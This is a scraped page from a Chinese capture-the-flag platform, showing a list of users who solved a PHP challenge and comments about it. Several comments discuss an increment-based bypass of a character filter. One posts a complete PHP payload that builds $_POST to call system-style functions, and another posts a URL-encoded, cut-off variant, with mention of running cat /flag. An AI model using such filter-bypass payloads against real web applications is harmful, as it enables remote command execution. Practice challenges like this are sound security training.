评分(3)
解题动态
1058886009 攻破了该题 18小时前
桃酥 攻破了该题 1天前
baozongwi 攻破了该题 2天前
Kyrie-Lrving 攻破了该题 9天前
coldplay99999 攻破了该题 10天前
飞天的母猪 攻破了该题 10天前
pbidle 攻破了该题 10天前
urahadas 攻破了该题 12天前
INEOS 攻破了该题 16天前
guoadmin 攻破了该题 17天前
kirito666 攻破了该题 19天前
valecalida 攻破了该题 20天前
JJJY 攻破了该题 20天前
2663645309 攻破了该题 23天前
tonycai 攻破了该题 23天前
龙天宇 攻破了该题 24天前
sraiL 攻破了该题 27天前
13470772171 攻破了该题 29天前
zhang0918 攻破了该题 29天前
评论
小丁小丁少发神经 1月前
举报
求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)
不会写代码的菜鸟 4月前
举报
这道题完全不是我能做的,有答案也看不懂
modeng 7月前
举报
以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501
hutiaan 7月前
举报
难,为了难而难
不懂就问 8月前
举报
参考:https://blog.csdn.net/qq_36292543/article/details/136623586
不会编程的崽 8月前
举报
自增绕过,最后的payload可以在burp里进行对特殊字符的url编码
xiaoxiao972521 8月前
举报
不做了,本地构建的脑瓜子刺挠,点跟蚊香去
Daniel2023 9月前
举报
$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);
treasure11 10月前
举报
大败而归┭┮﹏┭┮
viabytsai 11月前
举报
code=%24_%3D(%EF%BC%90%2F%EF%BC%90)._%3B%24_%3D%24_%5B''%3D%3D'%24'%5D%3B%24_%2B%2B%3B%24__%3D%24_%2B%2B%3B%24__%3D%24_%2B%2B.%24__%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D'_'.%24__.(%24_%2B%2B).%24_%3B%24